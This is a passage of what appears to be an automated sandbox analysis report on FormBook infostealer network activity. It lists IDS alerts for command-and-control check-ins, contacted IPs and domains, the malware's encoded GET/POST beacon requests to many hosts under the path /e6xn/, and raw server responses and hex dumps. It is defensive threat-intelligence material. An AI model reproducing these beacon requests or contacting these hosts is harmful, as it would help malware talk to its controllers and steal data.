                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49762 -> 89.31.143.90:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49764 -> 89.31.143.90:80
                Source: DNS query: www.nikazo.xyz
                Source: Joe Sandbox ViewIP Address: 87.236.19.107 87.236.19.107
                Source: Joe Sandbox ViewIP Address: 103.197.25.241 103.197.25.241
                Source: Joe Sandbox ViewIP Address: 64.190.62.22 64.190.62.22
                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                Source: Joe Sandbox ViewASN Name: BEGET-ASRU BEGET-ASRU
                Source: Joe Sandbox ViewASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
                Source: Joe Sandbox ViewASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
                Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=ptLjcD60OGLEAEKwUIEQaugGR9tSXE/bjIUNt3iL6Qw6jfpYmMXFU+LQzVNpETLyO7HgKKKoK0NH56hBGNACCL/xDZHnLmeKZtapvr1OSuWcevHuIw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.cqyh.oneConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=CBgiEcAQTvmtp6KW0R4Z7j3tS9oH+Sd4wWgtDPe8rtmYg/trD2DMciPVEqfGjRspk89YWIqewcapqz5yHVGzQ5KlflxjVuoMuuz+sMTok+5fFnqu2w==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.d4ffo73dz.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=9Ok63Zp3UlyeFJncTpLan6F7UfPHzm35fZEpdutLQ03GKmXAn6TmeK19kU+o3seWSyf9rIWEGfMs+8v+auRJ5uWoro43dFLf6YZQGlVbKlE3Xt0YSA==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.appmystartup.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=u61FFSswTsQwZHK5Df1sdB0Y128x+tID5YHOMFlYU8e6X6f1CT0d10xaq3wUYzHCl9vsukjaIczYmr5kws9YFzoUz2fAyAt1utXToSD7Y3kRqMygPw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.hondamechanic.todayConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=2Kfb+Brrh9GrmqPqLtRK/jRr6sBFjt1I8ubTlYZTytp88LF+iTgF/zqvnUYpIzG87louehFzf7+JPcLVzBlhDb38gBs1IrPZ/tUzM/hN1wjivuIhpg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.oc7o0.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=nPkHDMcb1JQH2fM03fg+aIDrHSSiblzQLJDfzfVFS5dXE5xkefwXFeSdKwFU7agvUteWFQW2j0bTvqR9HNEHAhnYAdzU3M7ag8PlDKnWcqNy6jrKrg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mgn.icuConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=fK5JMP1eyt4jdSIw5YXXC01WYkEietwRjqQFc45Aj4a+GaPHnYBED0rkUElBfcfrwtDI0snSXtvXktZSmOPgjr2IHnyFN7VJ42KSbRcfuNaQ+9lGPw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nikazo.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=agiyDRT46qDSSmihlQ4LWL8xIgO+qfSg1vPRp09QaQzBVRWpSaW3tusYt1FhFwISNvV57xmnsnPpxHCL/G4hmICdRu2qyIf5a9CtW3wt0Qkcp+tj5w==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.605alibahis.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=qjLanAtLSG+g6YhcGMXKobFEDsC37gbqnajlfmukJF4TH11e5HWV02203YM0+S2fdiE5dYRNrz4LXrhHAApVOWSTzQMTxIdRoLo0SBW6YGOyo1TtwQ==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.pro-ecoproduct.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=kzp/a47TZoeooijf6PAMz/PnwNMdJTtRUuOJK4qo3trrvBMD8vtq5KxCd9qMSTo59iVH98TL2IBESMiQybod0ACy6WBPglHFi3698tluOY189mrwzA==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.supportstuiwords.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=1UUYHFL4LdVgOiboeMjc0IWbZOVr8VDrWpD/OUuuls53JWREudPDYQ+nxzsCxMG6BUvSIs7k/B5ZpvZv05F76qqNcXO9IRc03t2/8HV/ry1cldLuRw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.syscomputerrd.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=0vI33Q4NEpmtOF7zniUBuj/B9uVSpeQXctuTHh1MPiMb1OOu6LKWAuvExYXMr2bPJ/7wAe8CJHHvd3UWKZqUB7/Hcv68Qi5JcHFgKGRsF2oedTZ7pw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.dxgsf.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=I+7uQ1p9U2QgrZ2LiZBQD/xPqYJdH7KI3wBT7UIkgW5Aog6q3Z2jXuQC4TUh/9LTZ7Sd+JF5RXm6MN/mwd+CmdOx0GtGi60mugQ+ypEmsJunmkEeVg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.le-kuk.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: crossorigin="anonymous"></script> </head><body class="error404 custom-background wp-embed-responsive theme-flash everest-forms-no-js woocommerce-no-js hfeed header-sticky left-logo-right-menu"><div id="preloader-background"><div id="spinners"><div id="preloader"> <span></span> <span></span> <span></span> <span></span> <span></span></div></div></div><div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Saltar al contenido</a><header id="masthead" class="site-header" role="banner"><div class="header-top"><div class="tg-container"><div class="tg-column-wrapper clearfix"><div class="left-content"><ul class="contact-info"><li><i class="fa fa-map-marker"></i>Santo Domingo RD</li><li><i class="fa fa-phone"></i>849-250-5089</li><li><i class="fa fa-envelope"></i>syscomputerrd@gmail.com</li></ul></div><div class="right-content"><div class="menu-social-container"><ul id="menu-social" class="social-menu"><li id="menu-item-635" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-635"><a href="https://www.facebook.com/syscomputerrd"><span class="screen-reader-text">facebook</span></a></li><li id="menu-item-639" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-639"><a href="https://www.instagram.com/sys_computer/"><span class="screen-reader-text">instagram</span></a></li><li id="menu-item-640" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-640"><a href="https://www.youtube.com/channel/UCz92hpqzrnHultxRscMZ5pQ"><span class="screen-reader-text">YOUTUBE</span></a></li></ul></div></div></div></div></div><div class="header-bottom"><div class="tg-container"><div class="logo"><div class="logo-text site-branding"><p 
class="site-title"><a href="https://hzw.avt.temporary.site/" rel="home">MOVIMIENTO JUVENTUD COMUNITARIA</a></p></div></div><div class="site-navigation-wrapper"><nav id="site-navigation" class="main-navigation" role="navigation"><div class="menu-toggle"> <i class="fa fa-bars"></i></div><div class="menu-menu-container"><ul id="primary-menu" class="menu"><li id="menu-item-741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-741"><a href="https://hzw.avt.temporary.site/">Inicio</a></li><li id="menu-item-748" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-748"><a href="https://hzw.avt.temporary.site/blog-4/">Movimiento JC</a></li><li id="menu-item-737" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-737"><a href="https://hzw.avt.temporary.site/contact/">Contact</a></li></ul></div></nav></div><div class="header-action-container"><div class="cart-wrap"><div class="flash-cart-views"> <a href="https://hzw.avt.temporary.site/cart/" class="wcmenucart-contents"> <i class="fa fa-opencart"></i> <span class="cart-value">0</span> </a></div><div class="widget woocommerce widget_shopping_cart"><h2 class="widgettitle">Carrito</h2><div class="widget_shopping_cart_content"></div><
                Source: unknownDNS traffic detected: queries for: www.cqyh.one
                Source: unknownHTTP traffic detected: POST /e6xn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USHost: www.d4ffo73dz.sbsContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 193Origin: http://www.d4ffo73dz.sbsReferer: http://www.d4ffo73dz.sbs/e6xn/User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: kangle/3.5Date: Mon, 18 Mar 2024 13:46:06 GMTContent-Type: text/html; charset=utf-8X-Cache: MISS from kangle web serverContent-Length: 985Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Mon, 18 Mar 2024 13:46:38 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Mon, 18 Mar 2024 13:46:41 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Mon, 18 Mar 2024 13:46:44 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Mon, 18 Mar 2024 13:46:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 
69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:47:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.0.28Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:47:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.0.28Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:47:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.0.28Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:47:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.0.28Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:47:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:47:39 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:47:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:47:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 18 Mar 2024 13:48:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 18 Mar 2024 13:48:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 18 Mar 2024 13:48:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 18 Mar 2024 13:48:14 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 282Connection: closeVary: Accept-Encoding Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.pro-ecoproduct.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:48:20 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:48:22 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:48:25 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:48:28 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:48:33 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc b2 db 72 db ca 92 2d fa 6c 7f 05 16 15 6b cb 9e 8b 00 41 90 94 44 ea b2 96 2d 5b 12 25 59 b6 75 a3 c4 ee 0e 47 a1 aa 08 94 58 40 c1 55 05 5e a4 f0 c7 f4 07 ec a7 fd b6 5f 4e c4 ee 1f 3b 59 00 78 93 a8 8b ed 39 fb ec 38 b2 09 a0 b2 32 47 8e 1c 39 b6 fe f6 e1 f3 ee f9 f5 97 8f 56 a8 23 be b3 65 9e 16 47 71 b0 5d a2 aa 04 67 8a c8 ce 56 44 35 b2 70 88 a4 a2 7a bb 74 71 be 67 6f 94 8a 68 8c 22 ba 5d 1a 30 3a 4c 84 d4 25 0b 8b 58 d3 18 b2 86 8c e8 70 9b d0 01 c3 d4 ce 0e 65 8b c5 4c 33 c4 6d 85 11 a7 db 55 c0 e0 2c ee 5b 92 f2 ed 52 22 45 8f 71 5a b2 42 49 7b db a5 50 eb 44 b5 2a 95 20 4a 02 47 c8 a0 32 ea c5 95 6a 75 a1 ed aa 14 be d0 6a 75 da 74 35 16 2c 26 74 54 b6 7a 82 73 31 5c b5 2a 3b 5b 9a 69 4e 77 be a0 80 5a b1 d0 70 93 c6 c4 b2 ad 4f 9f 2f db 9f da 1f 4f ce 3f 5b 87 17 97 f0 be f8 60 ed 7e fe 74 71 d2 3e 7f 77 da 7e b7 55 c9 eb f2 76 40 2e a1 52 8f b7 4b 22 68 71 61 e8 cf 8d 4a d5 b7 8f 67 25 d3 eb 61 72 86 32 97 fb b3 3c 1e 81 55 4c d3 6f 46 84 39 e8 17 20 59 5b 0a 4b 96 68 4b 8f 13 58 1b 4a 12 ce 30 d2 4c c4 15 4e fe 71 a3 44 0c 78 1c 29 b5 5d 1a 0b a4 34 6c 2a a4 11 b2 03 89 92 b0 b4 73 57 fa 57 d6 6d a4 4b ad e9 86 f2 14 b3 a3 52 b9 f4 af 3c b3 f5 6f 90 6a 7a 40 5e 87 fa 67 c0 d6 5c 32 32 57 17 de 0e 1d 34 d0 8e a6 11 58 07 c9 b1 63 86 aa ac 0c a9 af f2 fc 54 f2 e7 f3 21 2f d3 a1 f5 ec fc e5 12 a1 f9 f8 30 2f e4 43 20 11 46 3a b0 e4 3b 9c 07 e7 78 9f 51 24 71 58 5c 94 4b 1a c9 80 c2 dc b3 84 8f b1 96 e3 2f e0 38 9d 73 
